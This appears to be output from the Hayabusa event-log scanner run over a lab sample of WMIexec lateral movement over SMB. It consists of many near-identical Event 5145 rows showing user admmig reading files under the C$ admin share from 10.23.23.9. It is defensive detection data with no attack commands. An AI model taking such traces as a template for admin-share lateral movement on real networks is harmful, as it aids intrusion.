10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 
